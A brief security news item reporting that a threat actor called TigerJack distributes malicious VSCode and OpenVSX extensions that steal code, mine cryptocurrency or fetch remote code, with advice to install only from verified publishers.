A threat actor known as TigerJack is persistently targeting developers with harmful extensions on both the VSCode Marketplace and the OpenVSX registry. At least 11 malicious extensions have been distributed this year, with some removed from Microsoft's marketplace still available on OpenVSX. Two notable examples, "C++ Playground" and "HTTP Format," were downloaded 17,000 times before being taken down, only to be republished under new names.
The "C++ Playground" extension steals source code by exfiltrating keystrokes shortly after edits are made. "HTTP Format" functions as a legitimate tool but secretly runs a cryptocurrency miner that consumes the host's full processing power without restraint. A third, more dangerous category of extensions fetches and executes remote JavaScript code every 20 minutes, allowing dynamic deployment of ransomware or backdoors.
TigerJack disguises these attacks by creating multiple fake developer accounts with convincing branding and documentation. Despite reports from security researchers, the malicious extensions remain available on the OpenVSX registry. Developers are strongly advised to download extensions only from verified and reputable publishers to avoid compromise.
Read more...